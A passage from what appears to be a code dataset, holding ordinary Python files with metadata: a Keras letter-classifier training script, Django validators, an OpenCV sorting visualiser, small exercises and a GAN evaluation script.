'channels_first':\n\t\t\tX = X.reshape(train_samples, 1, img_rows, img_cols)\n\t\t\tinput_shape = (1, img_rows, img_cols)\n\t\telse:\n\t\t\tX = X.reshape(train_samples, img_rows, img_cols, 1)\n\t\t\tinput_shape = (img_rows, img_cols, 1)\n\n\t\tX = X.astype('float32')\n\n\t\tX /= 255\n\t\tprint(slovo)\n\t\toutput = loaded_model.predict(X, verbose=1)\n\t\n\t\tfor i in range(len(output)):\n\t\t\tindeks = output[i].argmax()\n\t\t\ttest_labels.append(azbuka.index(slovo)) #koja je to klasa\n\t\t\trounded_predictions.append(indeks) #kako je ispalo\n\t\t\tif azbuka.index(slovo) == indeks:\n\t\t\t\ttocno += 1\n\t\t\telse:\n\t\t\t\tkrivo += 1\n\n\tcm_plot_labels = ['(i)', '(o)', \"(š)ć\", 'a', 'b', 'c', 'cj', 'd', 'dj', 'dž', 'e', 'f', 'g', 'h', 'i', 'j', 'ja, (i)je', 'ju', 'k', 'l', 'm', 'n', 'o', 'p', 'pol.', 'r', 's', 'š', 't', 'u', 'v', 'z', 'ž']\n\tcm = confusion_matrix(test_labels, rounded_predictions)\n\t#cm_plot_labels = [i for i in range(1, 34)]\n\tcm_saving(cm, cm_plot_labels, 'Rezultati/' + model + val + '.png')\n\t\n\tfile = open('Results/' + model + val + '.txt','w') \n\tacc_by_class = []\n\tacc = []\n\tfor i in range(len(cm)):\n\t\tacc_by_class.append((cm[i][i] / test_labels.count(i), i) )\n\t\tacc.append((cm[i][i] / test_labels.count(i), i))\n\t\tfile.write(\"Slovo \" + azbuka[i] + \" TP \" + str (cm[i][i]) + \" Total \" +str(test_labels.count(i)) + '\\n')\n\t\n\tacc_by_class.sort()\n\tacc_by_class.reverse()\n\tfor a in acc_by_class[:5]:\n\t\tfile.write(azbuka[a[1]] + ' ' + str(a[0]) + ' ' + str(cm[a[1]]) + '\\n')\n\tfile.write('---------------\\n')\n\tfile.write('Total accuracy ' + str(accuracy_score(test_labels, rounded_predictions, normalize=True)) + '\\n')\n\tfile.write('Total accuracy2 ' + str(tocno / (tocno + krivo)) + '\\n')\n\tfile.write('---------------\\n')\n\tfor a in acc:\n\t\tfile.write(azbuka[a[1]] + ' ' + str(a[0]) + '\\n')\n\tfile.close()\n'''\nimg_rows, img_cols = 50, 50\ninput_shape = (img_rows, img_cols, 1)\nnum_classes = 33\n'''\nd_azbuka = {'(i)': '(i)', '(o)':'(o)', \"(sj)c'\": \"(š)ć\", 'a': 'a', 'b': 'b', 'c': 'c', 'cj': 'č', 'd': 'd', 'dj': 'đ', 'dz': 'dž', 'e': 'e', 'f': 'f', \n\t'g': 'g', 'h': 'h', 'i': 'i', 'j': 'j', 'ja, (i)je': 'ja,(i)je', 'ju': 'ju', 'k': 'k', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', \n\t'poluglas': 'pol.', 'r': 'r', 's': 's', 'sj': 'š', 't': 't', 'u': 'u', 'v': 'v', 'z': 'z', 'zj': 'ž'}\n'''\n#resetiranje mapa koje nastaju treniranjem\nsvi_modeli = [\"modelLeNet\", \"modelarapski\", \"modelkineski1\", \"modelkineski2\", \"modelVGG\"]\n\nif os.path.exists(\"Modeli\"):\n\tshutil.rmtree(\"Modeli\")\t\nos.makedirs(\"Modeli\")\n\nif os.path.exists(\"Rezultati\"):\n\tshutil.rmtree(\"Rezultati\")\t\nos.makedirs(\"Rezultati\")\n\nfor mod in svi_modeli:\n\tos.makedirs(\"Modeli/\" + mod)\n\tos.makedirs(\"Rezultati/\" + mod)\n\n#save_graph([1, 2, 3, 4, 5], [10, 20, 30, 40, 50], [5, 15, 20, 45, 80], 'Epohe', 'Točnost', 'Točnost klasifikacije', 'Točnost validacije', 'Graf točnosti', 'Rezultati/' + 'modelLeNet' + '/' + 'plot-' + 'modelLeNet' + '-data'+ str(1) + '-acc.png')\n\t\nfor i in range(1, 4):\n\ttreniraj(lenet(), 'Modeli/', 'modelLeNet', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\ttreniraj(arapski(), 'Modeli/', 'modelarapski', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\ttreniraj(kineski1(), 'Modeli/', 'modelkineski1', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\ttreniraj(kineski2(), 'Modeli/', 'modelkineski2', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\t#treniraj(VGG_16(), 'Modeli/', 'modelVGG', i, 'Raspodjela/data' + str(i), 5, 120, 120, 120)","sub_path":"Izrada dataseta/treniranje.py","file_name":"treniranje.py","file_ext":"py","file_size_in_byte":15171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"254215622","text":"import re\nimport requests\nfrom django.conf import settings\nfrom django.forms import ValidationError\nfrom django.utils.deconstruct import deconstructible\nimport xmltodict\n\n#open('서울특별시_우편번호.csv'): 만약 계속 바뀌는 데이터라면 이런식으로 유효성 검사할 때마다 불러들이면 됨\n\n@deconstructible\nclass MinLengthValidator(object):\n def __init__(self, min_length):\n self.min_length = min_length\n\n def __call__(self, value):\n if len(value) < self.min_length:\n raise ValidationError('{}글자 이상 입력해주세요.'.format(self.min_length))\n\n@deconstructible\nclass ZipCodeValidator(object):\n '우편번호 체계안내 : http://www.koreapost.go.kr/kpost/sub/subpage.jsp?contId=010101040100'\n\n def __init__(self, is_check_exist =False):\n self.is_check_exist = is_check_exist\n\n #ZipCodeValidator(is_check_exist=True, zip_code)로 생성과 동시에 ZipCodeValidator 객체 생성.\n\n #init 함수 내용에 의해 객체의 is_check_exist 속성값은 True로 지정됨.\n\n\n def __call__(self, zip_code):\n if not re.match(r'^\\d{5,6}$', zip_code):\n raise ValidationError('5자리 혹은 6자리 숫자로 입력해주세요.')\n\n if self.is_check_exist:\n self.check_exist_from_db(zip_code)\n\n #생성과 동시에 call 함수 실행. 처음 ZipCodeValidator 생성 시 파라미터로 들어왔던 zip_code가 다섯자리가 아닐 경우, ValidationError 발생.\n\n #다섯자리가 맞을 경우, 그다음 if문 실행. 이전에 self.is_check_exists=True 였으므로 if문 실행되어 check_exist() 함수 실행됨.\n# 아래에 def check_exist(self, zip_code) 정의.\n\n def check_exist_from_db(self, zip_code):\n from blog.models import ZipCode\n if not ZipCode.objects.filter(code=zip_code).exists():\n raise ValidationError('없는 우편번호입니다.')\n\n\n def check_exist(self, zip_code):\n '우체국 open api : http://biz.epost.go.kr/customCenter/custom/custom_10.jsp'\n\n #우편번호가 기존에 존재하는지 안하는지 검사\n\n params = {\n 'regkey': settings.EPOST_API_KEY,\n 'target': 'postNew',\n 'query': zip_code,\n }\n\n #우편번호 API를 이용하기 위해 필수로 지정해야 하는 인자들. http://biz.epost.go.kr/customCenter/custom/custom_10.jsp?subGubun=sub_3&subGubun_1=cum_33&gubun=m07에 명시되어있음. settings.py의 EPOST_API_KEY 변수에 API 이용을 위해 발급받은 키를 지정해놓았음. query 키에는 맨 처음 함수 파라미터로 zip_code가 검사 대상으로 들어감.\n\n xml = requests.get('http://biz.epost.go.kr/KpostPortal/openapi', params=params).text\n\n # 다음의 url 주소에 있는 내용을 텍스트로 가져오는 코드.\n #request.get() : HttpResponse 객체 리턴\n #request.get().text : HttpResponse 객체가 담는 내용을 xml 형태로 리턴\n\n response = xmltodict.parse(xml)\n # xml을 parse하여 dictionary로 변환(xmltodict의 기능)\n\n try:\n error = response['error']\n ## response, error 둘다 dict\n except KeyError:# 존재하는 우편번호일 경우 error 키가 없고, 따라서 KeyError 발생\n pass\n else:# 존재하지 않는 우편번호일 경우 ValidationError\n raise ValidationError('[{error_code}] {message}'.format(**error))\n\n# dict 형인 error를 **error로 언패킹. error = {'key':'value', 'key2':'value2' ...} 가 언패킹을 통해,\n# .format(key=value, key2=value2 ...) 로.\n# 여기서는,\n# .format(error_code=blabla, message=blabla) 로.\n# 최종적으로 ValidationError 일으킴.\n\n'''\ndef min_length_validator(min_length):\n def wrap(value):\n if len(value) < min_length:\n raise ValidationError('{}글자 이상 입력해주세요.'.format(min_length))\n return wrap\n\n\ndef max_length_validator(max_length):\n def wrap(value):\n if len(value) > max_length:\n raise ValidationError('{}글자 이하 입력해주세요.'.format(max_length))\n return wrap\n'''\n\n\ndef lnglat_validator(value):\n if not re.match(r'^(\\d\\.?\\d*),(\\d\\.?\\d*)$', value):\n raise ValidationError('Invalid LngLat Type')\n\n\ndef phone_number_validator(value):\n if not re.match(r'^01[06789][1-9]\\d{6,7}$', value):\n raise ValidationError('휴대폰 번호를 입력해주세요.')\n\n","sub_path":"programming/blog/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"102629589","text":"#! python 3.6\n# Create Date: 2019-07-29\n# Author: Scc_hy \n# Function: 画图所需文件\n\n# 加载包 \nimport random \nimport numpy as np \nimport time \nimport cv2 \nimport copy \n\n\n__doc__ = \"\"\"\nsplit to three class or function \n1- get_data function 获取随机列表,用于排序 \n2- get_time_info class 用于记录排序的时间\n3- get_figure2draw class 画图\n\"\"\"\n\n\ndef get_data(Length_of_list):\n \"\"\"\n 获取随机列表,用于排序\n :param: Length_of_list int 随机列表的长度\n \"\"\"\n data = list(range(Length_of_list))\n random.shuffle(data)\n return data\n\n\nclass get_time_info():\n \"\"\"\n 用于记录排序的时间\n \"\"\"\n def start_timer(self):\n \"\"\"\n 设置start_flg \n 开始计时,获取开始时间\n \"\"\"\n self.start_flag = True \n self.start = time.time() \n return self.start \n\n def stop_timer(self):\n \"\"\"\n 设置start_flg \n 停止计时,输出运行时间\n \"\"\"\n self.start_flag = False \n return self.time\n\n def get_time(self):\n \"\"\"\n 依据start_flg \n 计算出运行时间\n \"\"\"\n if self.start_flag:\n self.time = time.time() - self.start \n return self.time\n\n \nclass get_figure2draw():\n \"\"\"\n 1- 初始化OpenCV图像: GetColor & get_figure\n 2- 交换位置并画图: swap\n 3- 重新设置(交换位置后)条形图的高和颜色: _set_figure\n 4- 画出图形: Visualize \n 5- 突出交换的条形图: Mark\n\n \"\"\"\n WHITE = (255, 255, 255)\n RED = (0, 0, 255)\n BLACK = (0, 0, 0)\n YELLOW = (0, 127, 255)\n MAX_IM_SIZE = 500\n gt = get_time_info()\n\n def __init__(self, data, sort_title = 'Sort_type' \n , time_interval = 1):\n self.length = len(data) \n self.data = data\n self.sort_title = sort_title\n self.set_time_interval(time_interval)\n\n ## 初始化变量\n self.start = self.gt.start_timer()\n self.get_figure()\n\n\n\n def set_time_interval(self, time_interval):\n \"\"\"\n 设置 cv2.waitKey( time_interval )\n \"\"\"\n self.time_interval = time_interval\n\n\n def GetColor(self, val, TOTAL):\n \"\"\"\n 根据列表的值的大小上 由浅到深的颜色\n :param: val 数组对应值 data[idx] (排序的数)\n :param: TOTAL \n \"\"\"\n # 获取颜色\n return (120 + val * 255 // (2 * TOTAL), 255 - val * 255 // (2 * TOTAL), 0)\n\n\n def get_figure(self):\n \"\"\"\n 设置初始图像 \n 给条形图上色\n\n try:\n data = get_data(10)\n data = list(range(10))\n _bar_width = 5\n g2dr = get_figure2draw(data)\n g2dr.get_figure()\n cv2.imshow('data list' , g2dr.figure)\n cv2.waitKey(0)\n \"\"\"\n _bar_width = 5 \n self._bar_width = _bar_width\n figure = np.full((self.length * _bar_width, self.length * _bar_width, 3), 255, dtype = np.uint8)\n \n size = _bar_width * self.length\n self.im_size = size if size < self.MAX_IM_SIZE else self.MAX_IM_SIZE\n\n for i in range(self.length):\n val = self.data[i]\n ## 上色 \n figure[-1 - val * _bar_width :,\n i * _bar_width:i * _bar_width+_bar_width] = self.GetColor(val, self.length)\n \n self.figure = figure\n\n\n def Mark(self, img, marks, color):\n \"\"\"\n 设置颜色 \n 突出调换的列 \n :param: img figure.copy() \n figure: \n # global values Length * _bar_width 维度, Length * _bar_width 行, 3列 \n # figure = np.full((20 * _bar_width, 20 * _bar_width, 3), 255, dtype = np.uint8)\n :param: marks \n :param: color 要设置的颜色 \n WHITE = (255, 255, 255)\n RED = (0, 0, 255)\n BLACK = (0, 0, 0)\n YELLOW = (0, 127, 255)\n data[idx] global value\n \"\"\"\n for idx in marks:\n min_col = idx * self._bar_width\n max_col = min_col + self._bar_width\n min_row = -1- self.data[idx] * self._bar_width\n ## 条形图位置\n img[min_row:, min_col:max_col] = color \n\n\n def _set_figure(self, idx, val):\n \"\"\"\n 重新设置(交换位置后)条形图的高和颜色 \n :param: idx int 数组index \n :param: val 数组对应值 data[idx]\n \"\"\"\n \n # 锁定条形图两边位置\n min_col = idx * self._bar_width \n max_col = min_col + self._bar_width \n min_row = -1 - val *self._bar_width \n # 100维度 100行 3列\n self.figure[:, min_col:max_col] = self.WHITE\n self.figure[min_row:, min_col:max_col] = self.GetColor(val, self.length)\n\n\n def Visualize(self, mark1 = None, mark2 = None):\n \"\"\"\n 显示图像 \n figure: \n # global values Length * _bar_width 维度, Length * _bar_width 行, 3列 \n # figure = np.full((20 * _bar_width, 20 * _bar_width, 3), 255, dtype = np.uint8) \n im_size: \n # size = _bar_width * length \n # im_size = size if size < MAX_IM_SIZE else MAX_IM_SIZE\n # MAX_IM_SIZE = 500\n \n \"\"\"\n img = self.figure.copy()\n if mark2:\n self.Mark(img, mark2, self.YELLOW)\n if mark1:\n self.Mark(img, mark1, self.RED) # 长的置为红色并向后移动\n\n img = cv2.resize(img, (self.im_size, self.im_size))\n\n self.time = self.gt.get_time()\n cv2.putText(img, \"{} Time: {:.2f}s\".format(self.sort_title, self.time)\n ,(20, 20), cv2.FONT_HERSHEY_PLAIN, 1, self.YELLOW, 1)\n \n cv2.imshow(self.sort_title , img)\n \"\"\"\n waitKey的功能是不断刷新图像,时间频率为delay ,单位ms \n 返回值为当前键盘按键值 \n 1- 是在一个给定的时间内(单位ms)等待用户按键触发\n 如果用户没有按下键盘,则接着等待(循环)\n waitKey(0) 表示程序无线等待用户的按键事件\n 一般在imgshow的时候,如果设置waitKey(0),代表按任意键继续\n 2- 显示视频时,延迟时间需要设置为 大于0的参数\n \"\"\"\n cv2.waitKey(self.time_interval)\n\n ## 排序余姚用到的位置处理函数\n def swap(self, idx1, idx2):\n \"\"\"\n 交换 idx1, idx2 的值\n 并画刷新图 \n \"\"\"\n self.data[idx1], self.data[idx2] = self.data[idx2], self.data[idx1]\n # 交换位置 重新设置(交换位置后)条形图的高和颜色\n self._set_figure(idx1, self.data[idx1])\n self._set_figure(idx2, self.data[idx2])\n self.Visualize((idx1, idx2))\n\n def set_val(self, idx, val):\n \"\"\"\n :param: idx 位置 \n :param: val 值 \n data[idx] = val \n \"\"\"\n self.data[idx] = val \n self._set_figure(idx, val)\n self.Visualize((idx,))\n","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"569600039","text":"def isi98_python(M, nTries):\n n = len(M[0])\n\n\n\n\n\n\ndef fun(M):\n n = len(M[0])\n result = [0,0]\n k = M[:]\n counter = 0\n for i in range(1,n):\n temp = k[i][0:i]\n part_counter = len([x for x in temp if x >0])\n counter = part_counter + counter\n\n\n","sub_path":"inst/isi98.py","file_name":"isi98.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158213821","text":"#Enter the number of test cases\r\nt = int(input())\r\nwhile t > 0:\r\n #Enter the size of the array\r\n n = int(input())\r\n #Enter the space separated integers\r\n arr = [int(i) for i in input().split()]\r\n for i in range(n):\r\n s = 0\r\n for j in range(n):\r\n if i != j:\r\n s = s + arr[j]\r\n print(s, end=\" \")\r\n t = t - 1\r\n","sub_path":"Sum of Array Problem/Sum_of_Array_Puzzle.py","file_name":"Sum_of_Array_Puzzle.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"45524859","text":"#!/usr/bin/python\nimport sys\nimport numpy as np\nfrom analysis.prd_score import compute_prd, compute_prd_from_embedding, _prd_to_f_beta\nfrom prd import plot_pr_aucs,calc_pr_rec\nfrom sklearn.metrics import auc\nfrom generator import ModelGConvTranspose\nfrom Regressor import Regressor,load_embedder\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as utils\nimport matplotlib.pyplot as plt\nimport os\n\nNOISEIMAGE_DIM=10\nNOISE_DIM=NOISEIMAGE_DIM**2\nEnergyDepositScale = torch.tensor([4000]).float()\nMomentumScale = torch.tensor([30,30,100]).float()\nPointScale = torch.tensor([10,10]).float()\nPDGScale = torch.tensor([11]).float()\nMomentumPointPDGScale = torch.cat([MomentumScale,PointScale,PDGScale])\n\ndef main():\n input_dir, output_dir = sys.argv[1:]\n embedder = load_embedder('./analysis/embedder.tp')\n \n # data_val = np.load(input_dir + '/data_val.npz', allow_pickle=True)\n # val_data_path_out = output_dir + '/data_val_prediction.npz'\n # \n # data_test = np.load(input_dir + '/data_test.npz', allow_pickle=True)\n # test_data_path_out = output_dir + '/data_test_prediction.npz'\n \n data_train = np.load(input_dir + '/data_train.npz', allow_pickle=True)\n # test_data_path_out = output_dir + '/data_test_prediction.npz'\n \n generator_cpu = ModelGConvTranspose(z_dim=NOISEIMAGE_DIM, MomentumPointPDGScale = MomentumPointPDGScale,EnergyScale = EnergyDepositScale)\n # generator_cpu.load_state_dict(torch.load(os.path.dirname(os.path.abspath(__file__)) + '/gan_80.pt'))\n generator_cpu.load_state_dict(torch.load(os.path.dirname(os.path.abspath(__file__)) + '/gan_20.pt'))\n # generator_cpu.eval()\n \n # val\n data_size = 250\n EnergyDeposit_train = torch.tensor(data_train['EnergyDeposit'][:data_size].reshape(-1,1,30,30)).float()\n ParticleMomentum_train = torch.tensor(data_train['ParticleMomentum'][:data_size]).float()\n ParticlePoint_train = torch.tensor(data_train['ParticlePoint'][:data_size, :2]).float()\n ParticlePDG_train = torch.tensor(data_train['ParticlePDG'][:data_size].reshape(-1,1)).float()\n ParticleMomentum_ParticlePoint_ParticlePDG_train = torch.cat([ParticleMomentum_train, ParticlePoint_train, ParticlePDG_train], dim=1)\n calo_dataset_train = utils.TensorDataset(EnergyDeposit_train,ParticleMomentum_ParticlePoint_ParticlePDG_train)\n calo_dataloader_train = torch.utils.data.DataLoader(calo_dataset_train, batch_size=data_size, shuffle=False)\n\n with torch.no_grad():\n EnergyDeposit_train = []\n EnergyDeposit_train_truth = []\n for EnergyDeposit_train_batch,ParticleMomentum_ParticlePoint_ParticlePDG_train_batch in tqdm(calo_dataloader_train):\n noise = torch.randn(ParticleMomentum_ParticlePoint_ParticlePDG_train_batch.shape[0], NOISE_DIM)\n # print(ParticleMomentum_ParticlePoint_ParticlePDG_train_batch.shape)\n EnergyDeposit_train_gen_batch = generator_cpu(noise, ParticleMomentum_ParticlePoint_ParticlePDG_train_batch)\n EnergyDeposit_train.append(EnergyDeposit_train_gen_batch)\n data_real = embedder.get_encoding(torch.tensor(EnergyDeposit_train_batch).float().view(-1, 1, 30, 30)).detach().numpy()\n data_fake = embedder.get_encoding(torch.tensor(EnergyDeposit_train_gen_batch).float().view(-1, 1, 30, 30)).detach().numpy()\n precisions, recalls = calc_pr_rec(data_real, data_fake, num_clusters=100, num_runs=20)\n pr_aucs = plot_pr_aucs(precisions, recalls)\n plt.title('Num_clusters={}, num_runs={}, first third'.format(100, 20))\n plt.show()\n\n return 0\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"448420782","text":"\nclass UnionFind:\n def __init__(self, n :int):\n self.d = [-1] * n\n\n def find(self, x :int) -> int:\n if self.d[x] < 0: return x\n return self.find(self.d[x])\n \n def unite(self, x, y :int):\n xr, yr = self.find(x), self.find(y)\n if xr == yr:\n return\n\n if -self.d[xr] < -self.d[yr]:\n xr, yr = yr, xr\n\n self.d[xr] += self.d[yr]\n self.d[yr] = xr\n\n def is_same(self, x, y :int) -> bool:\n return self.find(x) == self.find(y)\n\n def size(self, x :int) -> int:\n return - self.d[self.find(x)]\n\n\ndef main():\n n, m = map(int, input().split())\n ab = [list(map(int, input().split())) for _ in range(m)]\n ab = [[a-1, b-1] for a, b in ab]\n\n uf = UnionFind(n)\n\n for a, b in ab:\n uf.unite(a, b)\n\n mx = 0\n for i in range(n):\n s = uf.size(i)\n if s > mx:\n mx = s\n\n print(mx)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p02573/s512175265.py","file_name":"s512175265.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432823900","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[98]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sn\n\n\n# In[99]:\n\n\ndata=pd.read_csv('D:DS_TriS/Advertising.csv')\ndata.head()\n\n\n# In[121]:\n\n\ndata1=data.drop(['Unnamed: 0'],1)\ndata1.head()\n\n\n# In[122]:\n\n\ncorr=data1.corr()\ncorr.nlargest(4,['sales'])['sales']\n\n\n# In[123]:\n\n\nX=data1.drop(['sales'],1)\nX.head()\n\n\n# In[124]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[125]:\n\n\nsc=StandardScaler()\nX2=sc.fit_transform(X)\nX2\n\n\n# In[126]:\n\n\ny=data1['sales'].values\ny\n\n\n# In[127]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[128]:\n\n\nX_train,X_test,y_train,y_test=train_test_split(X2,y,test_size=0.3,random_state=1)\n\n\n# In[129]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[130]:\n\n\nmodel=LinearRegression(normalize=True)\nmodel.fit(X_train,y_train)\n\n\n# In[131]:\n\n\nmodel.coef_\n\n\n# In[132]:\n\n\nmodel.intercept_\n\n\n# In[133]:\n\n\ny_pred=model.predict(X_test)\ny_pred\n\n\n# In[134]:\n\n\ny_test\n\n\n# In[135]:\n\n\na=pd.DataFrame({'actual':y_test,'predicted':y_pred})\na.head(10)\n\n\n# In[136]:\n\n\nfrom sklearn.metrics import r2_score\n\n\n# In[137]:\n\n\nr2_score(y_test,y_pred)\n\n\n# In[138]:\n\n\nmodel.score(X_train,y_train)\n\n\n# In[142]:\n\n\na=data1.iloc[100:105,:-1]\na\n\n\n# In[143]:\n\n\na=sc.fit_transform(a)\na\n\n\n# In[144]:\n\n\nmodel.predict(a)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"MLR_Advertisem.py","file_name":"MLR_Advertisem.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"317595414","text":"def read_number(f):\r\n return int(f.readline().strip())\r\n\r\n\r\ndef compute(people_count):\r\n people_necessary = 0\r\n count = 0\r\n\r\n for shyness_level, people in enumerate(people_count):\r\n if count < shyness_level:\r\n people_necessary += shyness_level - count\r\n count = shyness_level\r\n count += people\r\n\r\n return people_necessary\r\n\r\n\r\n\r\ndef main():\r\n with open('A-small-attempt0.in', 'r') as f:\r\n test_cases = read_number(f)\r\n\r\n for test_case in range(test_cases):\r\n most_shy, numbers = f.readline().split()\r\n print('Case #{}: {}'.format(test_case + 1, compute(list(map(int, numbers)))))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"solutions_5639104758808576_0/Python/Jakube/problemA.py","file_name":"problemA.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"484545281","text":"'''\nCreated on Nov 25, 2013\n\n@author: noampeled\n'''\n\nfrom src.commons.analyzer.analyzer import Analyzer\nfrom src.commons.analyzer.analyzerTimeSelector import AnalyzerTimeSelector\nfrom src.commons.utils import utils\nimport os\nimport numpy as np\n\n\nclass AnalyzerYoni(AnalyzerTimeSelector):\n PROCS_NAMES = ['1Or2', '2or4', '1Or4']\n PROC_1_2, PROC_2_4, PROC_1_4 = range(3)\n LABELS = [['1', '2'], ['2', '4'], ['1', '4']]\n\n def __init__(self, *args, **kwargs):\n kwargs['indetifier'] = 'yoni'\n super(AnalyzerYoni, self).__init__(*args, **kwargs)\n\n def loadData(self):\n matlabFullPath = os.path.join(self.folder, self.matlabFile)\n matlabDic = utils.loadMatlab(matlabFullPath)\n return matlabDic\n\n def getTrialsTimeLength(self, matlabDic):\n return matlabDic['x'].shape[1]\n\n def dataGenerator(self, matlabDic):\n X, Y = matlabDic['x'], matlabDic['y'][0]\n nanidx = np.where(np.isnan(X[0]))[0]\n self.xAxis = np.delete(self.xAxis, nanidx, axis=0)\n for x, y in zip(X, Y):\n x = np.delete(x, nanidx, axis=0)\n x = np.reshape(x, (x.shape[0], 1))\n yield ((x, y), {})\n\n def getTrialShape(self, matlabDic):\n x = matlabDic['x'][0]\n nanidx = np.where(np.isnan(x))[0]\n T = x.shape[0] - len(nanidx)\n return (T, 1) # Only one channel\n\n def metaDataGenerator(self, matlabDic):\n labels = matlabDic['y'][0]\n for label in labels:\n yield (label, {})\n\n def trialCond(self, label, trialInfo):\n flag = False\n if (self.procID == self.PROC_1_2):\n flag = (label in [1, 2])\n elif (self.procID == self.PROC_1_4):\n flag = (label in [1, 4])\n elif (self.procID == self.PROC_2_4):\n flag = (label in [2, 4])\n else:\n utils.throwException('wrong procID!')\n return flag\n\n def trialLabel(self, label, trialInfo):\n if (self.procID == self.PROC_1_2):\n y = 0 if label == 1 else 1\n elif (self.procID == self.PROC_1_4):\n y = 0 if label == 1 else 1\n elif (self.procID == self.PROC_2_4):\n y = 0 if label == 2 else 1\n else:\n utils.throwException('wrong procID!')\n return y\n\n def weightsFullFileName(self, samWeights):\n return os.path.join(self.folder, self.subject, samWeights)\n\n @property\n def weightsDicKey(self):\n return 'ActWgtsNoZeros'\n\n\n","sub_path":"src/yoni/analyzerYoni.py","file_name":"analyzerYoni.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"147970221","text":"\"\"\"\nSujet :\n\nExercice 1 :\nAfficher les nombres impairs de 7 à 13 avec une boucle.\n\nExercice 2 :\nDéfinir une liste contenant les chiffres romains de 1 à 10. Afficher l’élément III.\n\nExercice 3 :\nDéfinir un dictionnaire qui associe à chaque jour de la semaine, s’il fait partie du week-end ou non. En utilisant ce dictionnaire, déterminer si jeudi fait partie du week-end.\n\nExercice 4 :\nTélécharger la page www.wikipedia.fr. Afficher le message “erreur du serveur” si le code d’erreur est supérieur ou égal à 500.\n\n\"\"\"\n\n# Exercice 1\n\nfor compteur in range(7, 14):\n if compteur % 2 == 1:\n print(compteur)\n\nfor compteur in range(7, 14, 2):\n print(compteur)\n\n# Exercice 2\n\nliste_nombres = [\n 'I', 'II', 'III', 'IV', 'V',\n 'VI', 'VII', 'VIII', 'IX', 'X',\n]\n\nprint(liste_nombres[2])\n\n# Exercice 3\n\nfait_partie_du_week_end = {\n 'lundi': False,\n 'mardi': False,\n 'mercredi': False,\n 'jeudi': False,\n 'vendredi': False,\n 'samedi': True,\n 'dimanche': True,\n}\n\nif fait_partie_du_week_end['jeudi']:\n print('Jeudi est un jour du week-end')\nelse:\n print(\"Jeudi n'est pas un jour du week-end\")\n\n# Exercice 4\n\nimport requests\n\nreponse = requests.get('https://www.wikipedia.fr')\n\nif response.status_code >= 500:\n print('erreur du serveur')\n","sub_path":"correction.py","file_name":"correction.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"511365668","text":"import sys\nimport re\nimport unittest\n\nclass pseudoTest(unittest.TestCase):\n def test_dummy(self):\n self.assertTrue(1)\n\ndef do_edit(filename, filter=None):\n with open(filename, \"r\") as f:\n lines = f.readlines()\n with open(filename, \"w\") as f:\n for line in lines:\n if filter is not None and not filter.match(line):\n f.write(line)\n\nif __name__ == \"__main__\":\n # delete all lines containing the word \"delete\"\n filter = re.compile(r\".*\\bdelete\\b\")\n for name in sys.argv[1:]:\n do_edit(name, filter=filter)\n","sub_path":"tests/pseudoedit.py","file_name":"pseudoedit.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"494995583","text":"import json\n\nimport requests\n\nfrom setting import INVOICE_URL, PIASTIX_URL\n\n\nclass RequestManager:\n @staticmethod\n def send_request(data):\n if \"shop_currency\" in data:\n r = requests.post(url=PIASTIX_URL, data=json.dumps(data), headers={'content-type': 'application/json'})\n result = r.text\n elif data['currency'] == '643':\n r = requests.post(url=INVOICE_URL, data=json.dumps(data), headers={'content-type': 'application/json'})\n result = r.json()\n if result['error_code'] == 0:\n return result['data']['url']\n return '/'\n else:\n return '/'\n return '/'","sub_path":"app/Managers/RequestManager.py","file_name":"RequestManager.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"207673692","text":"def divide_by_three(list_of_pairs):\n for_features = {}\n test = {}\n train = {}\n destinations = [for_features, test, train]\n while len(list_of_pairs) > 2 or len(list_of_pairs) % 3 == 0:\n #grab a random id from big_genre and remove\n for m, l in enumerate(destinations):\n\n candidates = 